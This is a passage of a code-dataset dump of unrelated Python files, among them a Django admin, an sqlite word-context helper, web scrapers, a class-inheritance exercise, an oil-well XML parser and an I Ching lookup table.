entered.!\")\r\n","sub_path":"eng_weather_app.py","file_name":"eng_weather_app.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"637604289","text":"from django.contrib import admin\nfrom django.contrib.admin import SimpleListFilter, DateFieldListFilter\nfrom models import Photo, Album\n\n\nclass ImageSizeListFilter(SimpleListFilter):\n title = 'Image Size'\n parameter_name = 'size'\n\n def lookups(self, request, model_admin):\n return (\n ('<= 1MB', '< 1MB'),\n ('<= 10MB', '1MB < size <= 10MB'),\n ('<= 100MB', '10MB < size <= 100MB'),\n ('> 100MB', '> 100MB'), )\n\n def queryset(self, request, queryset):\n if self.value() == '<= 1MB':\n return queryset.filter(image_size__lte=1024 * 1024)\n if self.value() == '<= 10MB':\n return queryset.filter(\n image_size__gt=1024 * 1024,\n image_size__lte=10 * 1024 * 1024, )\n if self.value() == '<= 100MB':\n return queryset.filter(\n image_size__gt=10 * 1024 * 1024,\n image_size__lte=100 * 1024 * 1024, )\n if self.value() == '> 100MB':\n return queryset.filter(image_size__gt=100 * 1024 * 1024)\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n\n def owner_link(self, photo):\n return u\"{}\".format(photo.owner.id, photo.owner)\n\n owner_link.short_description = ''\n owner_link.allow_tags = True\n\n fields = ('title',\n 'description',\n 'date_uploaded',\n 'date_modified',\n 'image',\n 'owner',\n 'published')\n readonly_fields = ('date_uploaded',\n 'date_modified',)\n list_display = ('title',\n 'owner_link',\n 'date_uploaded',\n 'date_modified',\n 'image_size')\n #list_display_links = (owner_link,)\n search_fields = ['owner__username',\n 'owner__email',\n 'owner__first_name',\n 'owner__last_name', ]\n # attribute_of_class must be in db, cannot be function\n list_filter = (('date_uploaded', DateFieldListFilter),\n (ImageSizeListFilter),)\n\n\nclass AlbumAdmin(admin.ModelAdmin):\n\n def owner_link(self, album):\n return u\"{}\".format(album.owner.id, album.owner)\n\n owner_link.short_description = ''\n owner_link.allow_tags = True\n\n fields = ('title',\n 'description',\n 'photos',\n 'owner',\n 'date_created',\n 'date_modified',\n 'cover_photo',\n 'published')\n readonly_fields = ('date_created', 'date_modified',)\n list_display = ('title',\n 'description',\n 'owner_link',\n 'date_created',\n 'date_modified',\n 'published',\n )\n list_display_links = ('title', 'date_created',)\n search_fields = ['owner__username',\n 'owner__email',\n 'owner__first_name',\n 'owner__last_name']\n\n\nadmin.site.register(Photo, PhotoAdmin)\nadmin.site.register(Album, AlbumAdmin)\n","sub_path":"imagr_images/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"343855038","text":"\"\"\"\nThis file can be imported for any interaction with the context database\nFunctions:\n\nadd_word_type(word_type)\n -adds the given word_type (context word) to the Word_Types table\n\nadd_word_types(word_types)\n -calls add_word_type() for each item in the array word_types\n\nadd_word(word, word_type)\n -add word to the Words table and associates it with the word_type\n -returns false if word_type is not in the Word_Types table\n -returns false if word is alreayd in the Words table\n\nadd_words(words, word_type)\n -calls add_word() for each word in words\n -applys the same given word_type to all words\n\nadd_device_action(action, word_type, extremity_level)\n -adds an action to the Device_Actions table associated with word_type and extremity_level\n -returns false if word_type is not in the Word_Types table\n -returns false if action is alreayd in the Device_Actions table\n -may need tinkering after we understad how the actuators work\n\ncheck_word(word)\n -returns the context of the given word\n -if word = chilly\n -return = cold\n\ncheck_words(words)\n -returns an array of unique context words associated with the words in the given list\n\nget_words(word_type)\n -returns an array of all words in Words table associated with the given word_type\n\"\"\"\n\nimport sqlite3\n\n\ndef add_words(words, word_type):\n '''\n for adding batches of words\n words can be an array\n word_type should be a single value\n '''\n for word in words:\n add_word(word, word_type)\n\n\ndef add_word_types(word_types):\n '''\n for adding batches of word_types\n word_types can be an array\n '''\n for word_type in word_types:\n add_word_type(word_type)\n\n\ndef add_word(word, word_type):\n '''\n auto generates and ID and adds word with FK word_type\n word_type must already be in the DB\n prints to console if word_type is not already in the DB\n '''\n word = word.lower()\n word_type = word_type.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT 1 FROM Words WHERE word=?\", (word,))\n item_exists = c.fetchone()\n if (item_exists):\n return False\n\n c.execute(\"SELECT MAX(id) FROM Words\")\n max_id = c.fetchone()\n\n if (max_id[0]):\n next_id = max_id[0] + 1\n else:\n next_id = 1\n\n c.execute(\"SELECT id FROM Word_Types WHERE word_type=?\", (word_type,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n with conn:\n c.execute(\"INSERT INTO Words VALUES (?, ?, ?)\",\n (next_id, word, word_type_id[0]))\n return True\n else:\n return False\n\n conn.close()\n\n\ndef add_word_type(word_type):\n '''\n auto generates and ID and adds the word_type\n '''\n word_type = word_type.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT 1 FROM Word_Types WHERE word_type=?\", (word_type,))\n item_exists = c.fetchone()\n if (item_exists):\n return False\n\n c.execute(\"SELECT MAX(id) FROM Word_Types\")\n max_id = c.fetchone()\n\n if (max_id[0]):\n next_id = max_id[0] + 1\n else:\n next_id = 1\n\n with conn:\n c.execute(\"INSERT INTO Word_Types VALUES (?, ?)\", (next_id, word_type))\n\n conn.close()\n\n\ndef add_device_action(action, word_type, extremity_level):\n '''\n this may change depending on how we do actuators\n '''\n action = action.lower()\n word_type = word_type.lower()\n extremity_level = extremity_level.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT 1 FROM Device_Actions WHERE device_action=?\", (action,))\n item_exists = c.fetchone()\n if (item_exists):\n return False\n\n c.execute(\"SELECT MAX(id) FROM Device_Actions\")\n max_id = c.fetchone()\n\n if (max_id[0]):\n next_id = max_id[0] + 1\n else:\n next_id = 1\n\n c.execute(\"SELECT id FROM Word_Types WHERE word_type=?\", (word_type,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n with conn:\n c.execute(\"INSERT INTO Device_Actions VALUES (?, ?, ?, ?)\",\n (next_id, action, word_type_id[0], extremity_level))\n else:\n print(\"Word type not found in database\")\n\n conn.close()\n\n\ndef check_word(word):\n '''\n returns the context of the given word\n if word = freezing\n return = cold\n '''\n word = word.lower()\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT word_type_id FROM Words WHERE word=?\", (word,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n c.execute(\"SELECT word_type FROM Word_Types WHERE id=?\",\n (word_type_id[0],))\n word_type = c.fetchone()\n return word_type[0]\n\n else:\n return False\n\n\ndef check_words(words):\n contexts = []\n for word in words:\n context = check_word(word)\n if (context not in contexts and context != False):\n contexts.append(context)\n return contexts\n\n\ndef get_words(word_type):\n '''returns all words of specific word_type'''\n word_type = word_type.lower()\n\n conn = sqlite3.connect('database/context.db')\n c = conn.cursor()\n\n c.execute(\"SELECT id FROM Word_Types WHERE word_type=?\", (word_type,))\n word_type_id = c.fetchone()\n\n if (word_type_id):\n c.execute(\"SELECT word FROM Words WHERE word_type_id=?\",\n (word_type_id[0],))\n words = c.fetchall()\n else:\n return False\n\n if (words):\n return words\n else:\n return False\n","sub_path":"prototypes/database/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":5588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"429476924","text":"t=int(input())\nfor i in range(t):\n sa=input().split(' ')\n sb=input().split(' ')\n cele=0\n for d in sa:\n if(d in sb):\n cele=d\n break\n if(cele==0):\n print('No')\n continue\n\n sa.remove(cele)\n sb.remove(cele)\n if(int(sa[0])+int(sb[0])==int(cele)):\n print(\"Yes\")\n elif int(sa[0])==int(sb[0]) and int(cele)*2==int(sa[0]):\n print('Yes')\n else:\n print(\"No\")\n \n","sub_path":"Codeforces/Rating_B/Square.py","file_name":"Square.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"92086177","text":"'''\nLastEditors: 杜康\nLastEditTime: 2021-09-23 17:02:45\n'''\nfrom urllib.request import urlopen\n# 处理404跟500\nfrom urllib.error import HTTPError\n# 处理URL错误\nfrom urllib.error import URLError\nfrom bs4 import BeautifulSoup\n\ndef getTitle (url):\n try:\n html = urlopen(url)\n except HTTPError as e:\n return None\n try:\n bs = BeautifulSoup(html.read(), 'html.parser')\n title = bs.body.h1\n except AttributeError as e:\n return None\n return title\n\ntitle = getTitle('http://www.pythonscraping.com/pages/page1.html')\nif title == None:\n print('Title cound not be found')\nelse:\n print(title)","sub_path":"chapter-1/newWheel.py","file_name":"newWheel.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"114296779","text":"'''\nConcrete SettingModule class for a specific experimental SettingModule\n'''\n\n# Copyright (c) 2017 Jiawei Zhang \n# License: TBD\n\nfrom setting import setting\n\n\n\nclass SettingTest(setting):\n \n def load_run_save_evaluate(self):\n \n # load dataset\n X_train, X_test, y_train, y_test = self.dataset.load()\n\n\n training_set = {'X':X_train, 'y':y_train}\n testing_set = {'X':X_test, 'y':y_test} #.ravel\n \n # run MethodModule\n self.method.data = {'train': training_set, 'test': testing_set}\n learned_result = self.method.run()\n \n # save raw ResultModule\n self.result.data = learned_result\n self.result.save()\n \n # evaluating ResultModule (optional)\n # evaluation can be done independently after getting the learning ResultModule\n self.evaluate.data = learned_result\n return self.evaluate.evaluate()\n\n ","sub_path":"ex/SettingTest.py","file_name":"SettingTest.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"274374299","text":"print(\"Command processor initializing.\")\n\n#import spacy\n#import ru2\n\nimport re\nimport atom.notify\nimport signal\nimport os\nimport traceback\nfrom random import randint\n\nimport atom.conver\n\nimport pymorphy2\nmorph = pymorphy2.MorphAnalyzer()\n\nPID = os.getpid()\n\ndef sigint_handler(signum, frame):\n\tprint(\"sigint_handler\")\n\tsig_names = {23:\"NSIG\", 22:\"SIGABRT\", 21:\"SIGBREAK\", 8:\"SIGFPE\", 4:\"SIGILL\",\n\t\t\t 2:\"SIGINT\", 11:\"SIGSEGV\", 15:\"SIGTERM\", 0:\"SIG_DFL\", 1:\"SIG_IGN\"}\n\n\tatom.send_notify(\"Получил сигнал {}. Завершаюсь.\".format(sig_names[signum]))\n\tos.kill(PID, signal.SIGKILL)\n\ndef incom(text):\n\tif len(text) == 0:\n\t\treturn\n\n\ttry:\t\n\t\ttext = text.strip().lower()\n\t\tprint(\"incom: {}\".format(text))\n\n\t\tresult, confidence = atom.conversation.listen(text)\n\t\t\n\t\tif confidence > 0.0:\n\t\t\tif callable(result):\n\t\t\t\tresult()\n\n\t\t\telse:\n\t\t\t\tatom.send_notify(result)\n\t\telse:\t\t\n\t\t\tatom.send_notify(\"Нераспознанная входная последовательность\")\n\t\t\t\n\t\t\tfor t in text.split():\n\t\t\t\tatom.send_notify(str(morph.parse(t)))\n\n\t\t\t\n\t\n\texcept Exception as ex:\n\t\tatom.send_notify(\"exception in incom thread: {}\".format(str(ex)))\n\t\ttraceback.print_exc()\n\n","sub_path":"atom/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1185,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"483312001","text":"import json\n\n#Convert all scraped data into arrays for processing.\nclinton_data_raw = open('clintondata.txt', 'r')\ntrump_data_raw = open('trumpdata.txt','r')\nclinton_data = clinton_data_raw.read()\ntrump_data = trump_data_raw.read()\nclinton_list = clinton_data.split(\",\")\ntrump_list = trump_data.split(\",\")\n\n#Make data symettric in relation to (latitude, longitude) pair. Convert to tuple\ntrump_tuple_list = [(trump_list[i],trump_list[i+1],trump_list[i+2]) for i in range(0,len(trump_list),3)]\nclinton_tuple_list = [(clinton_list[i],clinton_list[i+1],clinton_list[i+2]) for i in range(0,len(clinton_list),3)]\ntrump_tuple_list_sorted = sorted(trump_tuple_list, key=lambda element: (element[0],element[1]))\nclinton_tuple_list_sorted = sorted(clinton_tuple_list, key=lambda element: (element[0],element[1]))\n\n#Convert tuples to JSON formatted data\nclinton_list_clean = []\ntrump_list_clean = []\nfor i in range(0,len(trump_tuple_list_sorted)):\n\tclinton_list_clean.append(clinton_tuple_list_sorted[i][0])\n\tclinton_list_clean.append(clinton_tuple_list_sorted[i][1])\n\tclinton_list_clean.append(clinton_tuple_list_sorted[i][2])\n\ttrump_list_clean.append(trump_tuple_list_sorted[i][0])\n\ttrump_list_clean.append(trump_tuple_list_sorted[i][1])\n\ttrump_list_clean.append(trump_tuple_list_sorted[i][2])\n\nwith open('data.json', 'w') as new_file:\n\tjson.dump([[\"Clinton\", clinton_list_clean], [\"Trump\", trump_list_clean]], new_file)\n\n","sub_path":"DataProcessing/cleanup.py","file_name":"cleanup.py","file_ext":"py","file_size_in_byte":1414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"616436010","text":"from textx import language, generator\nfrom .generators import load_metamodel\nfrom .generators.textmate_generator import TextMateGrammarGenerator\nfrom .utils import dump_to_file\n\n\n@language('EasyColorLang', '*.eclr')\ndef easy_coloring_lang():\n \"\"\"Language made for easier writing of TextMate grammars\"\"\"\n return load_metamodel()\n\n\n@generator('EasyColorLang', 'TextMate')\ndef textmate_gen_coloring(metamodel, model, output_path, overwrite, debug,\n **custom_args):\n \"\"\"Generator for TextMate syntax grammar from EasyColorLang spec\"\"\"\n ret_val = TextMateGrammarGenerator(model).generate()\n if not output_path:\n print(ret_val)\n else:\n dump_to_file(ret_val, output_path)\n return ret_val\n","sub_path":"gen_coloring/coloring_entry_point.py","file_name":"coloring_entry_point.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"136256270","text":"#В первой строке входных данных содержится целое число n - число классов.\n#В следующих n строках содержится описание наследования классов.\n# В i-й строке указано от каких классов наследуется i-й класс. \n# Обратите внимание, что класс может ни от кого не наследоваться. \n# Гарантируется, что класс не наследуется сам от себя (прямо или косвенно), \n# что класс не наследуется явно от одного класса более одного раза.\n#В следующей строке содержится число q - количество запросов.\n#В следующих q строках содержится описание запросов в формате <имя класса 1> <имя класса 2>.\n#Имя класса – строка, состоящая из символов латинского алфавита, длины не более 50.\n#Для каждого запроса выведите в отдельной строке слово \"Yes\", \n# если класс 1 является предком класса 2, и \"No\", если не является.\n\nlst_mro = [ # список введённых строк\n 'G : F', \n 'A',\n 'B : A',\n 'C : A',\n 'D : B C',\n 'E : D',\n 'F : D',\n 'X',\n 'Y : X A', \n 'Z : X',\n 'V : Z Y',\n 'W : V',\n]\nlst_q = [ # список введённых запросов\n 'A G', # Yes # A предок G через B/C, D, F\n 'A Z', # No # Y потомок A, но не Y\n 'A W', # Yes # A предок W через Y, V\n 'X W', # Yes # X предок W через Y, V\n #'X QWE', # No # нет такого класса QWE\n 'A X', # No # классы есть, но они нет родства :)\n 'X X', # Yes # родитель он же потомок\n '1 1', # No # несуществующий класс\n 'E E',\n 'B W' \n]\n\nlist_my = [\n 'Q',\n 'W',\n 'E',\n 'R',\n 'C',\n 'T : W E',\n 'U : E',\n 'I : E',\n 'O : E R',\n 'H : Q T',\n 'J : T',\n 'K',\n 'L : U I O',\n 'P : R C',\n 'A : H J',\n 'S : J K L P',\n 'F : P',\n 'G',\n 'V : A',\n 'B : S',\n 'N : F',\n 'M : F G',\n 'Z : V B N',\n 'X : N M'\n]\nclasses = {}\nfor _ in lst_mro:\n com = _.split()\n if len(com) > 1:\n parents = com[2:]\n children = com[0]\n for i in parents:\n if children in classes:\n classes[children] += [i]\n else:\n classes[children] = [i]\n else:\n classes[com[0]] = [0]\nprint(classes)\n\ndef loop(lst_chi):\n for _ in range(len(lst_chi)):\n i = lst_chi[_]\n while 1:\n if i not in classes:\n break \n if par == i:\n return 1\n if len(classes[i]) > 1:\n if loop(classes[i]):\n return 1\n else:\n break \n else: \n i = classes[i][0]\n \n\n#for _ in lst_q:\n# par, chi = _.split()\nfor _ in range(int(input())):\n par, chi = input().split()\n while 1:\n if chi not in classes:\n print('No')\n break \n if par == chi:\n print('Yes')\n break\n if len(classes[chi]) > 1:\n if loop(classes[chi]):\n print('Yes')\n break\n else:\n print('No')\n break \n else: \n chi = classes[chi][0] \n \n#teacher's solution\n'''n = int(input())\n\nparents = {}\nfor _ in lst_mro:\n a = _.split()\n parents[a[0]] = [] if len(a) == 1 else a[2:]\n\ndef is_parent(child, parent):\n return child == parent or any(map(lambda p: is_parent(p, parent), parents[child]))\nprint(parents)\n#q = int(input())\nfor _ in lst_q:\n a, b = _.split()\n print(\"Yes\" if is_parent(b, a) else \"No\") \n''' ","sub_path":"1_7.py","file_name":"1_7.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"43642131","text":"# -*- coding: utf-8 -*-\n# @Time  : 2021/2/18 3:18 下午\n# @Author : NewmanZhou\n# @Desc : ==============================================\n# Life is Short I Use Python!!!                      ===\n# If this runs wrong,don't ask me,I don't know why;  ===\n# If this runs right,thank god,and I don't know why. ===\n# Maybe the answer,my friend,is blowing in the wind. ===\n# ======================================================\n# @Project : StudySpace\n# @FileName: gftest.py\n# @Software: PyCharm\n# !/usr/bin/python3\nimport sys\nimport time\nimport hashlib\nimport requests\nimport urllib3\nfrom lxml import etree\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n_version = sys.version_info\n\nis_python3 = (_version[0] == 3)\n\norderno = \"ZF20212183665Ed5nW3\"\nsecret = \"929b51ac17ac4b11b70aac963e31dd50\"\n\nip = \"forward.xdaili.cn\"\nport = \"80\"\n\nip_port = ip + \":\" + port\n\ntimestamp = str(int(time.time()))\nstring = \"\"\nstring = \"orderno=\" + orderno + \",\" + \"secret=\" + secret + \",\" + \"timestamp=\" + timestamp\n\nif is_python3:\n string = string.encode()\n\nmd5_string = hashlib.md5(string).hexdigest()\nsign = md5_string.upper()\n# print(sign)\nauth = \"sign=\" + sign + \"&\" + \"orderno=\" + orderno + \"&\" + \"timestamp=\" + timestamp\n\n# print(auth)\nproxy = {\"http\": \"http://\" + ip_port, \"https\": \"https://\" + ip_port}\nheaders = {'Proxy-Authorization': auth,\n 'sec-ch-ua': '\"Chromium\";v=\"88\", \"Google Chrome\";v=\"88\", \";Not A Brand\";v=\"99\"',\n 'sec-ch-ua-mobile': '?0',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_0_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36',\n 'Referer': 'https://www.dalipan.com/', }\nr = requests.get(\"https://www.dalipan.com/search?keyword=%E4%B8%89%E4%B8%80%E9%87%8D%E5%B7%A5\", headers=headers,\n proxies=proxy, verify=False, allow_redirects=False)\nr.encoding = 'utf8'\nprint(r.status_code)\nprint(r.text)\nif r.status_code == 302 or r.status_code == 301:\n loc = r.headers['Location']\n print(loc)\n r = requests.get(loc, headers=headers, proxies=proxy, verify=False, allow_redirects=False)\n r.encoding = 'utf8'\n print(r.status_code)\n print(r.text)\n","sub_path":"ThreatBook/gftest.py","file_name":"gftest.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"283579872","text":"# -*- coding: ISO-8859-1 -*-\r\n# LKM 04/03/2016\r\nimport codecs\r\nimport bs4\r\nimport csv\r\nfrom marlimvar import MarlimVar\r\ng_variaveis = None\r\n\r\ndef le_variaveis_de_controle():\r\n variaveis = []\r\n counter = 0\r\n with codecs.open('baricentro.xml', encoding='ISO-8859-1', mode='r+') as f:\r\n textData = f.read()\r\n bs = bs4.BeautifulSoup(textData, 'lxml')\r\n # os elementos utilizados para a sintonia são os marcados na interface como \"ativos\"\r\n active_elements = bs.find_all(\"as_var\", {\"ativo\": \"TRUE\"})\r\n\r\n for element in active_elements:\r\n nova_variavel = MarlimVar(nome=str(counter)+element.attrs['nome'])\r\n counter += 1\r\n variaveis.append(nova_variavel)\r\n\r\n # carrega trechos das variaveis\r\n for parametros in element.find_all('parametros'):\r\n for sisprod in parametros.find_all('param_sisprod_rotulo'):\r\n nova_variavel.trecho.append(sisprod.text.replace(\" \", \"\").replace(\"\\n\", \"\"))\r\n\r\n # carrega valores das variaveis\r\n for nofilho in element.find_all('valor'):\r\n nova_variavel.valor.append(float(nofilho.text))\r\n\r\n # carrega correlacoes das variaveis\r\n for nofilho in element.find_all('correlacao'):\r\n nova_variavel.correlacao.append(nofilho.text)\r\n\r\n with open('variaveis.csv', 'rt') as csvfile:\r\n spamreader = csv.reader(csvfile, delimiter=';', quotechar='|')\r\n for row in spamreader:\r\n nome, valor_inicial, limite_inferior, limite_superior = row[0:4]\r\n for variavel in variaveis:\r\n vnome = ''.join([c for c in variavel.nome if c not in \"1234567890\"])\r\n if vnome == nome.strip(\" \"):\r\n variavel.limite_inferior = float(limite_inferior)\r\n variavel.limite_superior = float(limite_superior)\r\n\r\n print(variaveis)\r\n return variaveis\r\n\r\n\r\ndef atualiza_xml(variaveis):\r\n \"\"\"Atualiza variaveis definidas no arvquivo xml\"\"\"\r\n\r\n with codecs.open('baricentro.xml', encoding='ISO-8859-1', mode='r+') as f:\r\n bs = bs4.BeautifulSoup(f.read(), 'lxml')\r\n sistema_producao = bs.find(\"sistema_producao\")\r\n\r\n pr = sistema_producao.find(\"pr\")\r\n ip = sistema_producao.find(\"ip\")\r\n rgof = sistema_producao.find(\"rgof\")\r\n bsw = sistema_producao.find(\"bsw\")\r\n\r\n for obj in variaveis:\r\n if obj.tem_valor():\r\n if obj.nome == 'pr':\r\n pr.text = str(obj.valor[0])\r\n elif obj.nome == \"ip\":\r\n ip.text = str(obj.valor[0])\r\n elif obj.nome == \"rgof\":\r\n rgof.text = str(obj.valor[0])\r\n elif obj.nome == \"bsw\":\r\n bsw.text = str(obj.valor[0])\r\n\r\n linhas = ['linha_maritima',\r\n 'linha_aerea',\r\n 'poco_com_coluna',\r\n 'linha_maritima_inj',\r\n 'linha_aerea_inj',\r\n 'poco_sem_coluna',\r\n 'linha_enterrada',\r\n 'riser']\r\n\r\n for nome_linha in linhas:\r\n for linha in bs.find_all(nome_linha):\r\n trecho = linha.nome.text\r\n for corr in linha.find_all(\"corr\"):\r\n for objeto in variaveis:\r\n if objeto.tem_trecho(trecho) and objeto.tem_correlacao():\r\n corr.attrs[\"tipo\"] = objeto.correlacao\r\n\r\n for fator_correcao in linha.find_all(\"fatores_correcao\"):\r\n trecho = linha.nome.text\r\n for objeto in variaveis:\r\n if objeto.tem_trecho(trecho) and objeto.tem_valor():\r\n if objeto.nome == \"fcorrp\":\r\n for fcorrp in fator_correcao.find_all(\"fcorrp\"):\r\n fcorrp.string = str(objeto.valor[0])\r\n elif objeto.nome == \"fcorrt\":\r\n for fcorrp in fator_correcao.find_all(\"fcorrt\"):\r\n fcorrp.string = str(objeto.valor[0])\r\n\r\n html = bs.prettify(bs.original_encoding)\r\n f.seek(0)\r\n f.readline()\r\n f.truncate()\r\n f.write(html)\r\n\r\n\r\ndef le_output():\r\n fim = 0\r\n inicio = 0\r\n num_linhaVV = 0\r\n linhaVV = \"\"\r\n\r\n QOSC, QLSC, PWF, PTUB, TWF, PWH, TWH, QGSC, PPDG, TPDG, TSUP = [0] * 11\r\n\r\n with open('baricentro.xml', encoding='ISO-8859-1') as inf:\r\n for number, line in enumerate(inf, 1):\r\n if \"INICIO_SAIDA\" in line:\r\n inicio = number\r\n if \"**Fluidos**\" in line:\r\n fim = number\r\n if \"VV\" in line:\r\n num_linhaVV = number\r\n if \"Trechos por Unidades\" in line:\r\n linhaP = number\r\n\r\n with open('baricentro.xml', encoding='ISO-8859-1') as openfile:\r\n for number, line in enumerate(openfile, 1):\r\n if number == num_linhaVV:\r\n linhaVV = line\r\n\r\n if inicio < number < fim:\r\n for part in line.split():\r\n #print(line)\r\n if \"QOSC=\" in part: #Flux of oil in surface conditions\r\n QOSC = float(line.split('=')[1])\r\n if \"QLSC=\" in part: #Flux of liquid\r\n QLSC = float(line.split('=')[1])\r\n if \"PWF=\" in part: #Pressure well... pressão no caneado\r\n PWF = float(line.split('=')[1])\r\n if \"PTUB=\" in part:\r\n PTUB = float(line.split('=')[1])\r\n if \"TWF=\" in part:\r\n TWF = float(line.split('=')[1])\r\n if \"PWH=\" in part:\r\n PWH = float(line.split('=')[1])\r\n if \"TWH=\" in part:\r\n TWH = float(line.split('=')[1])\r\n if \"QGSC=\" in part:\r\n QGSC = float(line.split('=')[1])\r\n\r\n ## para ler PPDG, TPDG, TSUP:\r\n\r\n sequencia = 0\r\n bs = bs4.BeautifulSoup(openfile, 'lxml')\r\n for valvula in bs.find_all(\"valvulas_instalada\"):\r\n if valvula.find(\"fabricante\").text == \"PDG\":\r\n sequencia = int(valvula.attrib['seq']) + 1\r\n\r\n # valores de valvula\r\n vv = linhaVV.split('=')[1].split(';')\r\n\r\n tamanho = len(vv) - 1\r\n\r\n for i in range(len(vv)):\r\n if i < tamanho:\r\n if int(vv[i]) == sequencia:\r\n offset_linha_PDG = i + 2\r\n\r\n pressao_fundo, temperatura_fundo, temperatura_superficie = None, None, None\r\n\r\n with open('baricentro.xml', encoding='ISO-8859-1') as openfile:\r\n for number, line in enumerate(openfile, 1):\r\n if number == linhaP + offset_linha_PDG:\r\n pressao_fundo = line\r\n if number == linhaP + offset_linha_PDG + tamanho:\r\n temperatura_fundo = line\r\n if number == linhaP + tamanho + 1:\r\n temperatura_superficie = line\r\n\r\n pressao_fundo_PDG = (pressao_fundo.split(';')[0])\r\n PPDG = float(pressao_fundo_PDG.split('=')[1])\r\n\r\n temperatura_fundo_PDG = (temperatura_fundo.split(';')[0])\r\n TPDG = float(temperatura_fundo_PDG.split('=')[1])\r\n\r\n temperatura_sup = (temperatura_superficie.split(';')[0])\r\n TSUP = float(temperatura_sup.split('=')[1])\r\n\r\n ret = {\"QOSC\": QOSC, #fluxo de óleo em surface conditions\r\n \"QLSC\": QLSC, # liquido\r\n \"PWF\": PWF, # perssao fundo do poço\r\n \"PTUB\": PTUB, #pressao montante choke\r\n \"TWF\": TWF, #\r\n \"PWH\": PWH, # pressao na arbvore de natal\r\n \"TWH\": TWH, # temperatura na\r\n \"QGSC\": QGSC, #fluxo de gas surface condifions\r\n \"PPDG\": PPDG, #pressao pdg\r\n \"TPDG\": TPDG, #temepratura pdg\r\n \"TSUP\": TSUP} #temepratura do PTUB\r\n\r\n with open(\"debug_output.log\", \"a\") as f:\r\n print(ret, file=f)\r\n\r\n return ret\r\n\r\n\r\nif __name__ == \"__main__\":\r\n print(le_variaveis_de_controle())\r\n print(le_output())\r\n","sub_path":"le_xml.py","file_name":"le_xml.py","file_ext":"py","file_size_in_byte":8320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"415650567","text":"# -*- coding: utf-8 -*-\n#周易六爻\nfrom gua_64 import GUA_64\nTIANGAN=[u\"甲\", u\"乙\", u\"丙\", u\"丁\", u\"戊\", u\"己\", u\"庚\", u\"辛\", u\"壬\", u\"癸\"]\nDIZHI=[u\"子\", u\"丑\", u\"寅\", u\"卯\", u\"辰\", u\"巳\", u\"午\", u\"未\", u\"申\", u\"酉\", u\"戌\", u\"亥\"]\n\nSISHI_WXXQ = {\n u\"木\":{u\"子\":u\"相\", u\"丑\":u\"囚\", u\"寅\":u\"旺\", u\"卯\":u\"旺\", u\"辰\":u\"囚\", u\"巳\":u\"休\", \\\n u\"午\":u\"休\", u\"未\":u\"囚\", u\"申\":u\"死\", u\"酉\":u\"死\", u\"戌\":u\"囚\", u\"亥\":u\"相\"},\n \n u\"火\":{u\"子\":u\"死\", u\"丑\":u\"休\", u\"寅\":u\"相\", u\"卯\":u\"相\", u\"辰\":u\"休\", u\"巳\":u\"旺\", \\\n u\"午\":u\"旺\", u\"未\":u\"休\", u\"申\":u\"囚\", u\"酉\":u\"囚\", u\"戌\":u\"休\", u\"亥\":u\"死\"},\n \n u\"土\":{u\"子\":u\"囚\", u\"丑\":u\"旺\", u\"寅\":u\"死\", u\"卯\":u\"死\", u\"辰\":u\"旺\", u\"巳\":u\"相\", \\\n u\"午\":u\"相\", u\"未\":u\"旺\", u\"申\":u\"休\", u\"酉\":u\"休\", u\"戌\":u\"旺\", u\"亥\":u\"囚\"},\n \n u\"金\":{u\"子\":u\"休\", u\"丑\":u\"相\", u\"寅\":u\"囚\", u\"卯\":u\"囚\", u\"辰\":u\"相\", u\"巳\":u\"死\", \\\n u\"午\":u\"死\", u\"未\":u\"相\", u\"申\":u\"旺\", u\"酉\":u\"旺\", u\"戌\":u\"相\", u\"亥\":u\"休\"},\n \n u\"水\":{u\"子\":u\"旺\", u\"丑\":u\"死\", u\"寅\":u\"休\", u\"卯\":u\"休\", u\"辰\":u\"死\", u\"巳\":u\"囚\", \\\n u\"午\":u\"囚\", u\"未\":u\"死\", u\"申\":u\"相\", u\"酉\":u\"相\", u\"戌\":u\"死\", u\"亥\":u\"旺\"},\n }\n\nWUXING_JISHENG = {\n u\"木\":{u\"子\":u\"沐浴\", u\"丑\":u\"冠带\", u\"寅\":u\"临官\", u\"卯\":u\"帝旺\", u\"辰\":u\"衰\", u\"巳\":u\"病\", \\\n u\"午\":u\"死\", 